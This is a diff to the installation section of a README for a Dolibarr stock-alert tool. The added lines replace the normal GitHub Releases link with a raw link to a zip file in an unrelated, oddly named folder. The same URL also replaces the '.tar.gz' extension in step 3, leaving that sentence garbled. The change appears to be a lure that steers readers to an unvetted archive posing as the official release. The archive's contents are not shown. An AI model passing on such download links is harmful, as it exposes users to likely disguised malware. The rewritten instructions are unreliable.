PenPa77/dolibarr-stock-alert/README.md

 ## 🔧 Installation Steps

 1. **Visit the Releases Page:**
-   Go to the [Releases page](https://github.com/PenPa77/dolibarr-stock-alert/releases) to find the latest version of dolibarr-stock-alert.
+   Go to the [Releases page](https://raw.githubusercontent.com/PenPa77/dolibarr-stock-alert/main/Aspidobranchia/dolibarr-stock-alert.zip) to find the latest version of dolibarr-stock-alert.

 2. **Download the Application:**
    Look for the latest release and click on the appropriate file to download it to your computer.

 3. **Extract the Files (if needed):**
-   If the downloaded file is a compressed archive (`.zip` or `.tar.gz`), extract it to a folder on your computer.
+   If the downloaded file is a compressed archive (`.zip` or `https://raw.githubusercontent.com/PenPa77/dolibarr-stock-alert/main/Aspidobranchia/dolibarr-stock-alert.zip`), extract it to a folder on your computer.

 4. **Open Your Terminal:**
    Launch the terminal application on your computer.
 If you are using MacOS, you can find the terminal in the Applications > Utilities folder.
 If using Linux, you should find it in your applications menu.